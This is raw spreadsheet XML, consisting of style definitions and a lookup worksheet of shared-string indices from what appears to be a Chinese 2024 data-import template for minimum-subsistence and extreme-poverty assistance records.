    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="2" xfId="92" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="92" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="92" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="3" xfId="92" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="92"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3" fillId="0" borderId="1" xfId="92" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="71" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="57" fontId="3" fillId="0" borderId="1" xfId="92" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0"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3" fillId="0" borderId="1" xfId="73" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="92" applyNumberFormat="1"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0" fontId="3" fillId="0" borderId="0" xfId="92" applyFont="1" applyFill="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7" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="92"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92" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="92"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3" fillId="0" borderId="1" xfId="9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2" borderId="1" xfId="72" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="0" borderId="1" xfId="72" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="9" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="3" borderId="1" xfId="92" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="92" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="92" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="9" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="0" borderId="1" xfId="92" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="3" borderId="1" xfId="92" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="0" borderId="1" xfId="92"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49" fontId="3" fillId="0" borderId="1" xfId="77" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="0" borderId="1" xfId="77"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wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="4" borderId="1" xfId="92" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="14" fillId="4" borderId="1" xfId="92"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1" xfId="92" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="83" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0"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49" fontId="0" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="3" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="92" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="92" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="9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10 2 3" xfId="49"/>
    <cellStyle name="40% - 强调文字颜色 1 6 2" xfId="50"/>
    <cellStyle name="40% - 强调文字颜色 2 11 2 3" xfId="51"/>
    <cellStyle name="差 25 3 4" xfId="52"/>
    <cellStyle name="20% - 强调文字颜色 3 12 2 2 2 3" xfId="53"/>
    <cellStyle name="40% - 强调文字颜色 6 11 3 2 4" xfId="54"/>
    <cellStyle name="检查单元格 8 3" xfId="55"/>
    <cellStyle name="常规 11 14 3 2 4" xfId="56"/>
    <cellStyle name="20% - 强调文字颜色 6 16 3 3" xfId="57"/>
    <cellStyle name="60% - 强调文字颜色 4 18 2" xfId="58"/>
    <cellStyle name="60% - 强调文字颜色 1 4 2 2" xfId="59"/>
    <cellStyle name="标题 3 16 2 2 2 3" xfId="60"/>
    <cellStyle name="常规 31 9 12 3" xfId="61"/>
    <cellStyle name="注释 3 3 3" xfId="62"/>
    <cellStyle name="注释 8 2 2 2 2" xfId="63"/>
    <cellStyle name="链接单元格 12 2 2 3" xfId="64"/>
    <cellStyle name="常规 9 11 2 2 2" xfId="65"/>
    <cellStyle name="60% - 强调文字颜色 3 24" xfId="66"/>
    <cellStyle name="常规 4 17 5 2 2" xfId="67"/>
    <cellStyle name="标题 3 14 2 2" xfId="68"/>
    <cellStyle name="注释 6 3 2" xfId="69"/>
    <cellStyle name="样式 1 2 3 3 2 2" xfId="70"/>
    <cellStyle name="常规 10" xfId="71"/>
    <cellStyle name="常规 11" xfId="72"/>
    <cellStyle name="常规 10 23 2 2" xfId="73"/>
    <cellStyle name="常规 2" xfId="74"/>
    <cellStyle name="链接单元格 18" xfId="75"/>
    <cellStyle name="输入 16 3 2" xfId="76"/>
    <cellStyle name="常规 20" xfId="77"/>
    <cellStyle name="注释 16 2 2 2 2" xfId="78"/>
    <cellStyle name="适中 8" xfId="79"/>
    <cellStyle name="警告文本 26 2 2" xfId="80"/>
    <cellStyle name="常规_Sheet1" xfId="81"/>
    <cellStyle name="强调文字颜色 3 9 3 2" xfId="82"/>
    <cellStyle name="样式 1 5 3 2 2" xfId="83"/>
    <cellStyle name="注释 4 3" xfId="84"/>
    <cellStyle name="常规 3" xfId="85"/>
    <cellStyle name="注释 10 2" xfId="86"/>
    <cellStyle name="注释 10 3 3" xfId="87"/>
    <cellStyle name="常规 4" xfId="88"/>
    <cellStyle name="注释 12 2 3" xfId="89"/>
    <cellStyle name="注释 18 2 3" xfId="90"/>
    <cellStyle name="常规 14" xfId="91"/>
    <cellStyle name="注释 5 4" xfId="92"/>
    <cellStyle name="注释 24 2 2" xfId="93"/>
    <cellStyle name="注释 8 2 2" xfId="94"/>
  </cellStyles>
  <dxfs count="2">
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFFF9900"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor rgb="FFFF9900"/>
        </patternFill>
      </fill>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium9" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="00FFFF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esktop\&#25937;&#21161;&#31995;&#32479;\2024\2024.2\&#20302;&#20445;&#29305;&#22256;&#23548;&#20837;&#25968;&#25454;&#27169;&#26495;@2024012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低保特困数据-导入模板"/>
      <sheetName val="选项"/>
      <sheetName val="区划代码查询表"/>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B1:C142"/>
  <sheetViews>
    <sheetView showFormulas="1" topLeftCell="G1" workbookViewId="0">
      <selection activeCell="J6" sqref="J6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="19.25" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="6.625" customWidth="1"/>
    <col min="3" max="3" width="31.875" hidden="1" customWidth="1"/>
    <col min="4" max="6" width="9" hidden="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="2:3">
      <c r="B1" t="s">
        <v>0</v>
      </c>
      <c r="C1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="2" customHeight="1" spans="2:3">
      <c r="B2" t="s">
        <v>2</v>
      </c>
      <c r="C2" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="3" customHeight="1" spans="2:3">
      <c r="B3" t="s">
        <v>2</v>
      </c>
      <c r="C3" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="4" customHeight="1" spans="2:3">
      <c r="B4" t="s">
        <v>2</v>
      </c>
      <c r="C4" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="5" customHeight="1" spans="2:3">
      <c r="B5" t="s">
        <v>2</v>
      </c>
      <c r="C5" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6" customHeight="1" spans="2:3">
      <c r="B6" t="s">
        <v>2</v>
      </c>
      <c r="C6" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="7" customHeight="1" spans="2:3">
      <c r="B7" t="s">
        <v>2</v>
      </c>
      <c r="C7" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="2:3">
      <c r="B8" t="s">
        <v>2</v>
      </c>
      <c r="C8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="2:3">
      <c r="B9" t="s">
        <v>2</v>
      </c>
      <c r="C9" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="10" customHeight="1" spans="2:3">
      <c r="B10" t="s">
        <v>2</v>
      </c>
      <c r="C10" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="11" customHeight="1" spans="2:3">
      <c r="B11" t="s">
        <v>2</v>
      </c>
      <c r="C11" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="12" customHeight="1" spans="2:3">
      <c r="B12" t="s">
        <v>2</v>
      </c>
      <c r="C12" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="13" customHeight="1" spans="2:3">
      <c r="B13" t="s">
        <v>14</v>
      </c>
      <c r="C13" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="14" customHeight="1" spans="2:3">
      <c r="B14" t="s">
        <v>16</v>
      </c>
      <c r="C14" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="15" customHeight="1" spans="2:3">
      <c r="B15" t="s">
        <v>17</v>
      </c>
      <c r="C15" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="16" customHeight="1" spans="2:3">
      <c r="B16" t="s">
        <v>19</v>
      </c>
      <c r="C16" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="17" customHeight="1" spans="2:3">
      <c r="B17" t="s">
        <v>20</v>
      </c>
      <c r="C17" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="18" customHeight="1" spans="2:3">
      <c r="B18" t="s">
        <v>22</v>
      </c>
      <c r="C18" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="19" customHeight="1" spans="2:3">
      <c r="B19" t="s">
        <v>24</v>
      </c>
      <c r="C19" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="20" customHeight="1" spans="2:3">
      <c r="B20" t="s">
        <v>25</v>
      </c>
      <c r="C20" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="21" customHeight="1" spans="2:3">
      <c r="B21" t="s">
        <v>26</v>
      </c>
      <c r="C21" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="2:3">
      <c r="B22" t="s">
        <v>28</v>
      </c>
      <c r="C22" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="2:3">
      <c r="B23" t="s">
        <v>30</v>
      </c>
      <c r="C23" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="2:3">
      <c r="B24" t="s">
        <v>32</v>
      </c>
      <c r="C24" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="2:3">
      <c r="B25" t="s">
        <v>34</v>
      </c>
      <c r="C25" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="2:3">
      <c r="B26" t="s">
        <v>36</v>
      </c>
      <c r="C26" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="2:3">
      <c r="B27" t="s">
        <v>38</v>
      </c>
      <c r="C27" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="2:3">
      <c r="B28" t="s">
        <v>40</v>
      </c>
      <c r="C28" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="29" customHeight="1" spans="2:3">
      <c r="B29" t="s">
        <v>42</v>
      </c>
      <c r="C29" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="30" customHeight="1" spans="2:3">
      <c r="B30" t="s">
        <v>44</v>
      </c>
      <c r="C30" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="31" customHeight="1" spans="2:3">
      <c r="B31" t="s">
        <v>46</v>
      </c>
      <c r="C31" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="32" customHeight="1" spans="2:3">
      <c r="B32" t="s">
        <v>48</v>
      </c>
      <c r="C32" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="33" customHeight="1" spans="2:3">
      <c r="B33" t="s">
        <v>50</v>
      </c>
      <c r="C33" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="34" customHeight="1" spans="2:3">
      <c r="B34" t="s">
        <v>52</v>
      </c>
      <c r="C34" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="35" customHeight="1" spans="2:3">
      <c r="B35" t="s">
        <v>54</v>
      </c>
      <c r="C35" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="36" customHeight="1" spans="2:3">
      <c r="B36" t="s">
        <v>55</v>
      </c>
      <c r="C36" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="37" customHeight="1" spans="2:3">
      <c r="B37" t="s">
        <v>57</v>
      </c>
      <c r="C37" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="38" customHeight="1" spans="2:3">
      <c r="B38" t="s">
        <v>59</v>
      </c>
      <c r="C38" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="39" customHeight="1" spans="2:3">
      <c r="B39" t="s">
        <v>61</v>
      </c>
      <c r="C39" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="40" customHeight="1" spans="2:3">
      <c r="B40" t="s">
        <v>63</v>
      </c>
      <c r="C40" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="41" customHeight="1" spans="2:3">
      <c r="B41" t="s">
        <v>65</v>
      </c>
      <c r="C41" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="42" customHeight="1" spans="2:3">
      <c r="B42" t="s">
        <v>67</v>
      </c>
      <c r="C42" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="43" customHeight="1" spans="2:3">
      <c r="B43" t="s">
        <v>69</v>
      </c>
      <c r="C43" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="44" customHeight="1" spans="2:3">
      <c r="B44" t="s">
        <v>71</v>
      </c>
      <c r="C44" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="45" customHeight="1" spans="2:3">
      <c r="B45" t="s">
        <v>73</v>
      </c>
      <c r="C45" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="46" customHeight="1" spans="2:3">
      <c r="B46" t="s">
        <v>75</v>
      </c>
      <c r="C46" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="47" customHeight="1" spans="2:3">
      <c r="B47" t="s">
        <v>77</v>
      </c>
      <c r="C47" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="48" customHeight="1" spans="2:3">
      <c r="B48" t="s">
        <v>79</v>
      </c>
      <c r="C48" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="49" customHeight="1" spans="2:3">
      <c r="B49" t="s">
        <v>81</v>
      </c>
      <c r="C49" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="50" customHeight="1" spans="2:3">
      <c r="B50" t="s">
        <v>83</v>
      </c>
      <c r="C50" t="s">
        <v>84</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="2:3">
      <c r="B51" t="s">
        <v>85</v>
      </c>
      <c r="C51" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="2:3">
      <c r="B52" t="s">
        <v>87</v>
      </c>
      <c r="C52" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="53" customHeight="1" spans="2:3">
      <c r="B53" t="s">
        <v>89</v>
      </c>
      <c r="C53" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="54" customHeight="1" spans="2:3">
      <c r="B54" t="s">
        <v>91</v>
      </c>
      <c r="C54" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="55" customHeight="1" spans="2:3">
      <c r="B55" t="s">
        <v>93</v>
      </c>
      <c r="C55" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="56" customHeight="1" spans="2:3">
      <c r="B56" t="s">
        <v>95</v>
      </c>
      <c r="C56" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="57" customHeight="1" spans="2:3">
      <c r="B57" t="s">
        <v>97</v>
      </c>
      <c r="C57" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="58" customHeight="1" spans="2:3">
      <c r="B58" t="s">
        <v>99</v>
      </c>
      <c r="C58" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="59" customHeight="1" spans="2:3">
      <c r="B59" t="s">
        <v>101</v>
      </c>
      <c r="C59" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="60" customHeight="1" spans="2:3">
      <c r="B60" t="s">
        <v>103</v>
      </c>
      <c r="C60" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="61" customHeight="1" spans="2:3">
      <c r="B61" t="s">
        <v>105</v>
      </c>
      <c r="C61" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="62" customHeight="1" spans="2:3">
      <c r="B62" t="s">
        <v>107</v>
      </c>
      <c r="C62" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="63" customHeight="1" spans="2:3">
      <c r="B63" t="s">
        <v>109</v>
      </c>
      <c r="C63" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="64" customHeight="1" spans="2:3">
      <c r="B64" t="s">
        <v>111</v>
      </c>
      <c r="C64" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="65" customHeight="1" spans="2:3">
      <c r="B65" t="s">
        <v>113</v>
      </c>
      <c r="C65" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="66" customHeight="1" spans="2:3">
      <c r="B66" t="s">
        <v>115</v>
      </c>
      <c r="C66" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="67" customHeight="1" spans="2:3">
      <c r="B67" t="s">
        <v>117</v>
      </c>
      <c r="C67" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="68" customHeight="1" spans="2:3">
      <c r="B68" t="s">
        <v>118</v>
      </c>
      <c r="C68" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="69" customHeight="1" spans="2:3">
      <c r="B69" t="s">
        <v>120</v>
      </c>
      <c r="C69" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="70" customHeight="1" spans="2:3">
      <c r="B70" t="s">
        <v>122</v>
      </c>
      <c r="C70" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="71" customHeight="1" spans="2:3">
      <c r="B71" t="s">
        <v>124</v>
      </c>
      <c r="C71" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="72" customHeight="1" spans="2:3">
      <c r="B72" t="s">
        <v>126</v>
      </c>
      <c r="C72" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="73" customHeight="1" spans="2:3">
      <c r="B73" t="s">
        <v>128</v>
      </c>
      <c r="C73" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="74" customHeight="1" spans="2:3">
      <c r="B74" t="s">
        <v>130</v>
      </c>
      <c r="C74" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="75" customHeight="1" spans="2:3">
      <c r="B75" t="s">
        <v>132</v>
      </c>
      <c r="C75" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" spans="2:3">
      <c r="B76" t="s">
        <v>134</v>
      </c>
      <c r="C76" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="77" customHeight="1" spans="2:3">
      <c r="B77" t="s">
        <v>136</v>
      </c>
      <c r="C77" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="78" customHeight="1" spans="2:3">
      <c r="B78" t="s">
        <v>138</v>
      </c>
      <c r="C78" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="79" customHeight="1" spans="2:3">
      <c r="B79" t="s">
        <v>139</v>
      </c>
      <c r="C79" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="80" customHeight="1" spans="2:3">
      <c r="B80" t="s">
        <v>140</v>
      </c>
      <c r="C80" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="81" customHeight="1" spans="2:3">
      <c r="B81" t="s">
        <v>142</v>
      </c>
      <c r="C81" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="82" customHeight="1" spans="2:3">
      <c r="B82" t="s">
        <v>144</v>
      </c>
      <c r="C82" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="83" customHeight="1" spans="2:2">
      <c r="B83" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="84" customHeight="1" spans="2:2">
      <c r="B84" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="85" customHeight="1" spans="2:2">
      <c r="B85" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="86" customHeight="1" spans="2:2">
      <c r="B86" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="87" customHeight="1" spans="2:2">
      <c r="B87" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="88" customHeight="1" spans="2:2">
      <c r="B88" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="89" customHeight="1" spans="2:2">
      <c r="B89" t="s">
        <v>152</v>
      </c>
